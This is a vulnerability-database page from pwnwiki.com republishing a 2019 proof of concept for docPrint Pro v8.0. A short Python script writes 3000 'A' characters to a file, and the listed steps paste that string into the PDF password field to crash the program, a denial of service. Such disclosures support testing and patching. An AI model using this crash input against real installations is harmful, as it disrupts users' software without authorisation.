免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
POC
# -*- coding: utf-8 -*- # Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.verypdf.com # Software: http://dl.verypdf.net/docprint_pro_setup.exe # Version: 8.0 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt" # 2.- Copy the text from the generated DocConverterr.txt file to clipboard # 3.- Open docPrint Document Converter # 4.- Go to 'Setting' > 'PDF Security' # 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK' # 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc' # 7.- Click on 'Start', you will see a crash buffer = "\x41" * 3000 f = open ("DocConverter.txt", "w") f.write(buffer) f.close()
免费、自由、人人可编辑的漏洞库